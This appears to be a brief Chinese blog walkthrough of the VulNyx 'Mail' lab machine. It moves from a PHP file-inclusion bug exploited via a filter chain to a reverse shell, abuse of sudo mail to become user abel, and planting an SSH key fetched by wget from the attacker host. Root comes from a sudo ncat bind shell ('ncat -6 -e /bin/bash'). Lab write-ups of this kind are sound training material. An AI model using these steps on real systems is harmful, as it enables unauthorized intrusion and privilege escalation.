VulNyx - Mail 靶机

扫描靶机 发现22 和 80端口

访问80端口 发现id=1 和2 时都会有回显
image



dirsearch -u http://http://192.168.200.39
image

访问这个1 和 2的路径 发现竟然和上面那个id=1和id=2的内容相同 这里就可以判断是个include漏洞了
image



用php_filter_chain_generator-main构造伪协议链 执行rce
image



执行反弹shell
image



拿到shell之后sudo -l 发现能以abel身份执行mail命令
image
利用mail来执行sh 身份切换为abel了
image
然后
cd /home/abel
mkdir .ssh
cd .ssh
wget 192.168.200.101:8000/id_rsa.pub 把kali的公钥拿到
cat id_rsa.pub > authorized_keys 把公钥写入认证里
这样我们就能用kali ssh登录到abel了



然后
sudo -l
发现我们能用root 权限执行ncat命令 这就简单了
image

将shell弹到本地的4444端口
sudo ncat -6 -e /bin/bash -lp 4444 &

然后ipv6在本地监听4444端口
ncat -6 fe80::20c:29ff:fed7:c556%ens33 4444

getshell完成
image

posted @ 2024-08-30 14:38  WSssSW  阅读(4)  评论(0编辑  收藏  举报